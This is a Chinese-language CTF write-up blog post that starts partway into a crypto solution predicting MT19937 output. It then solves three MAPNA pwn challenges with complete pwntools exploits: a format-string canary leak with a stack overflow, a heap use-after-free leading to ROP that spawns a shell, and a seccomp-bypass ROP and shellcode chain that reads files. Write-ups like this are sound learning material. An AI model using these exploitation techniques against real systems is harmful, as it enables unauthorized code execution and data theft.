368163678666609325358026149200535116090648801749210267074911311082497122727619418, 132244486142872991925346591101049195464960273281071718729683433268064480383763200, 187524820546739515326467479985404725103464284941528452333038247179114024353648176, 283320427018968981710753682470612392210145925235229015984823155988278867852342424, 273076274412276025537791810337835157311632197268182698230310819989050497776963263, 327014096802403962955714851262399814244813548393488285833127238998882721132883968, 206832690482752439833856322955815020186765387390104398292271480795930880106073325, 104167288428075991079921385804154376915444422785935287020330329091692992364020356, 468442878028756757484855000070722747267796721762231179211069666438706434848755245, 13006681553773847728990900149289800641720551387610802780788594468812438984199760, 199716185379958028413200192962692404940513822154864483463050473557869065589649168, 412558417168152436059170177108518481504104909389966119467224740980715361039084900, 379013360598848524426838307544021120793535763669172279637583374247930017257612752, 79510803625960975136293110699095743477640774841480691165531320726532279504009152, 119246467719878286004186703543298639812649580965124121805161153548472942538790653, 44235048729597559877492812430806736314711896199059487848598597142896457753232432, 453319033816285234767354843915966019736243075972507643199351036007057824008570000, 300975897791737470999557383409844137620736489995632513055593286593028252152372832, 488688724028459389993054497130088474659149461722402520817247390457263798063265080, 98311703485802819685121101139900586756957739352203591545958914778011243453808576, 503894794312461918204750180188338003935699664049776370432270755067603639622480931]
enc = 1954128229670403595826293823451515985816812578139791173172421160740653397416251058891670696398940725266238000104900728729829302299509397650740333416176077

from extend_mt19937_predictor import ExtendMT19937Predictor
predictor = ExtendMT19937Predictor()
#导入已知的624个数据,导入后指向尾部
for i in range(1,80):
    predictor.setrandbits(TMP[i]//i**2, 256)

KEY = sum([predictor.predict_getrandbits(256 >> _) ** 2 for _ in range(8)]) 
msg = enc^KEY
long_to_bytes(msg)
#b'MAPNA{4Re_y0U_MT19937_PRNG_pr3d!cT0r_R3ven9E_4057950503c1e3992}'

PWN

ninipwn

感觉pwn很难,热身都不好热

栈溢出

int __cdecl main(int argc, const char **argv, const char **envp)
{
  disable_io_buffering();
  puts("XOR encryption service");
  encryption_service();
  return 0;
}
unsigned __int64 encryption_service()
{
  char buf[264]; // [rsp+0h] [rbp-110h] BYREF
  unsigned __int64 v2; // [rsp+108h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  printf("Text length: ");
  __isoc99_scanf("%d", &text_length);
  getchar();
  if ( (unsigned int)text_length < 0x101 )
  {
    printf("Key: ");
    read(0, key, 0xAuLL);                       // \0*8 + \xff*2 覆盖length两字节造成溢出
    printf("Key selected: ");
    printf(key);
    putchar(10);
    printf("Text: ");
    read(0, buf, text_length);
    encrypt((__int64)buf);
    printf("Encrypted output: ");
    write(1, buf, text_length);
  }
  else
  {
    puts("Text length must be less than 256");
  }
  return v2 - __readfsqword(0x28u);
}

先是对长度作了限制,但在读入key的时候有溢出,能覆盖到长度的后两个字节形成溢出.

由于栈深度并不大,不适合覆盖第2字节,控制好长度覆盖到ret的尾字节修改尾字节到win

还有两个小点,先要泄露canary,然后要对payload用key异或

from pwn import *

p = process('./ninipwn')
context(arch='amd64', log_level='debug')

p.sendlineafter(b"Text length: ", b'256')
key = b'%39$p\x00\x00\x00\x19'
p.sendafter(b"Key: ",key)
p.recvuntil(b'0x')
canary = int(p.recv(16), 16)
print(f"{canary = :x}")

pay = b'\x00'*0x108 + flat(canary,0) + b'\x38'
p.sendafter(b"Text: ", xor(pay, key[:8]))

p.interactive()

Buggy Paint

一个堆题,add,free,show,edit都没有问题,但是edit和show都用了select来选择块而select又没有同步,这样在select后如果块已删除变成脏数据,使得edit和show还能使用,形成UAF

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  const char *v3; // rdi
  int v5; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v6; // [rsp+8h] [rbp-8h]

  v6 = __readfsqword(0x28u);
  init_0();
  v3 = "Welcome to BuggyPaint!";
  puts("Welcome to BuggyPaint!");
  while ( 1 )
  {
    sub_12A9(v3, a2);
    menu();
    v5 = -1;
    a2 = (char **)&v5;
    v3 = "%d";
    __isoc99_scanf("%d", &v5);
    getchar();
    switch ( v5 )
    {
      case 1:
        m1add();
        break;
      case 2:
        m2free();
        break;
      case 3:
        m3select();                             // 6060
        break;
      case 4:
        m4edit();                               // select-free-edit实现UAF
        break;
      case 5:
        m5show();
        break;
      default:
        puts("Invalid option");
        return 0LL;
    }
  }
}

1,由于块有大小限制,需要释放8块才能得到unsort

2,select后的块删除后需要再建块将数据块建到原管理块的位置来写指针

3,通过_environ得到栈地址然后在返回地址写ROP

from pwn import *

context(arch='amd64', log_level='debug')
libc = ELF('./libc.so.6')

#p = process('./chall')
p = remote('3.75.185.198', 2000)
def add(idx, w,h, msg = b'A'):
    p.sendlineafter(b'> ', b'1')
    p.sendline(b'0')
    p.sendline(str(idx).encode())
    p.sendline(str(w).encode())
    p.sendline(str(h).encode())
    p.sendline(b'1')
    p.send( msg)

def free(idx):
    p.sendlineafter(b'> ', b'2')
    p.sendline(b'0')
    p.sendline(str(idx).encode())

def select(idx):
    p.sendlineafter(b'> ', b'3')
    p.sendline(b'0')
    p.sendline(str(idx).encode())

def edit(msg):
    p.sendlineafter(b'> ', b'4')
    p.sendlineafter(b': ', msg)

def show():
    p.sendlineafter(b'> ', b'5')
    p.recvuntil(b"Box content:\n")

add(0,0x10,2)
add(1,0x10,2)

for i in range(2,10):
    add(i,0x10,0x10)

select(2)
for i in range(3,10):
    free(i)

free(2)  #释放第8块到unsort利用UAF读得到libc
show()
libc.address = u64(p.recv(8)) - 0x219ce0
print(f"{libc.address = :x}")

for i in range(2,10):
    add(i,0x10,0x10)

select(0)
free(0)
free(1)
#将新块数据部分建到原0块管理块位置写入到environ的指针,show得到栈地址
add(1, 0x10,3,flat(0,1,0,0x10,3,libc.sym['_environ']))
show()
stack = u64(p.recv(8)) - (0xfa8 - 0xe68)
print(f"{stack = :x}")

#重写1块,指到返回地址
free(1)
add(1, 0x10,3,flat(0,1,0,0x10,3,stack))

#gdb.attach(p,"b*0x555555555c44\nc")
#在返回地址写ROP
pop_rdi = libc.address + 0x000000000002a3e5 # pop rdi ; ret
bin_sh = next(libc.search(b'/bin/sh\x00'))
edit(flat(pop_rdi+1, pop_rdi, bin_sh, libc.sym['system']))
p.sendline(b"cat ./flag.txt")
p.interactive()
#MAPNA{1-c4n7-b3l13v3-7h47-4-bu6-c4n-l34d-70-7h15-f23f344b}

Protector

一个加了保护的ORW题

程序会在maze目录写入0x100个文件,其中包含flag并限制只通话open read write getdents close mprotect exit

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf[32]; // [rsp+0h] [rbp-20h] BYREF

  disable_io_buffering();
  printf("Input: ");
  init_sandbox();
  read(0, buf, 0x98uLL);
  return 0;
}
Input:  line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x0b 0xc000003e  if (A != ARCH_X86_64) goto 0013
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
 0004: 0x15 0x00 0x08 0xffffffff  if (A != 0xffffffff) goto 0013
 0005: 0x15 0x06 0x00 0x00000000  if (A == read) goto 0012
 0006: 0x15 0x05 0x00 0x00000001  if (A == write) goto 0012
 0007: 0x15 0x04 0x00 0x00000002  if (A == open) goto 0012
 0008: 0x15 0x03 0x00 0x00000003  if (A == close) goto 0012
 0009: 0x15 0x02 0x00 0x0000000a  if (A == mprotect) goto 0012
 0010: 0x15 0x01 0x00 0x0000004e  if (A == getdents) goto 0012
 0011: 0x15 0x00 0x01 0x000000e7  if (A != exit_group) goto 0013
 0012: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0013: 0x06 0x00 0x00 0x00000000  return KILL

编程题,先通过溢出得到libc,然后读入后续的payload到bss然后移栈执行

得到libc后可以得到pop rax和syscall;ret,后续的payload通过mprotect将bss所在页设置成rwx并读入shellcode

shellcode打开maze目录并逐个找开目录里的文件,文件长度不为0时输出

from pwn import *

elf = ELF('./chall')
libc = ELF('./libc6_2.35-0ubuntu3.6_amd64.so')
context(arch='amd64', log_level='debug')

target = 0x404000
pop_rdi_rsi_rdx = 0x4014d9
pop_rbp = 0x00000000004011dd # pop rbp ; ret
ret = 0x4014dc
leave_ret = 0x401525

p = process('./chall')
#p = remote('3.75.185.198', 10000)

#gdb.attach(p, "b*0x401525\nc")

#leak libc, read ROP:mprotect
#libc6_2.35-0ubuntu3.6_amd64
pay = b'\x00'*0x28 + flat([ret, 
    pop_rdi_rsi_rdx, elf.got['printf'],0,0, elf.plt['printf'], #printf(elf.got['printf'])
    pop_rdi_rsi_rdx,0,target+0x100,0x78, elf.plt['read'], #read(0,0x404100,0x78)
    pop_rbp, target+0x100-8, leave_ret
    ])
p.sendafter(b'Input: ',pay.ljust(0x98, b'\x00'))
libc.address = u64(p.recv(6)+b'\0\0') - libc.sym['printf']
print(f"{libc.address = :x}")

syscall = libc.sym['getpid']+9
pop_rax = libc.address + 0x0000000000045eb0 # pop rax ; ret

pay2 = flat([pop_rdi_rsi_rdx, target,0x1000,7, pop_rax, 10, syscall, #mprotect(0x404000,0x1000,7)
    pop_rdi_rsi_rdx, 0, target+0x200,0x100, pop_rax,0, syscall, #read(0,0x404200,0x100)
    target+0x200
    ])
p.send(pay2)

#dir-ORW 打开目录,读目录结构到0x404400
pay_shell = 'nop;'+shellcraft.open('./maze/')+shellcraft.getdents('rax',target+0x400,0x800) 
pay_shell+= f'''
  mov r12, 0x404410;
s1:
  xor rax,rax; mov al, byte ptr [r12]; mov r14,rax /*读目录项长度 存到r14*/
  mov rdi, r12; add rdi,2;
  add r12, r14
  test r14,r14
  jz s2
  cmp r14, 0x18
  jle s1
  dec rdi;mov byte ptr[rdi], 0x2f;  /*在文件名前加 ./maze/ */
  dec rdi;mov byte ptr[rdi], 0x65;
  dec rdi;mov byte ptr[rdi], 0x7a;
  dec rdi;mov byte ptr[rdi], 0x61;
  dec rdi;mov byte ptr[rdi], 0x6d;
  dec rdi;mov byte ptr[rdi], 0x2f;
  dec rdi;mov byte ptr[rdi], 0x2e;
  xor rsi,rsi; xor rdx,rdx; push 2;  pop rax;  syscall;mov r13,rax; /* open(file,0,0) */
  mov rdi,rax;  mov rsi, 0x404f00;  mov rdx, 0x30;  push 0;  pop rax;  syscall; /* read(rax,0x404f00,0x30) */
  test rax,rax; jz s3; /* read返回的长度 */
  mov rdi,1; mov rsi, 0x404f00; mov rdx, 0x30; push 1; pop rax; syscall; /* write(1, 0x404f00,0x30) */
  jmp s2
s3:
  mov rdi,r13; push 3; pop rax; syscall; /* close(r13) */
  test r14,r14
  jnz s1
s2:
  nop
'''
p.send(asm(pay_shell))

p.interactive()
#MAPNA{d3lu510n-0f-pr073c710n-28fba2}

  • 24
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值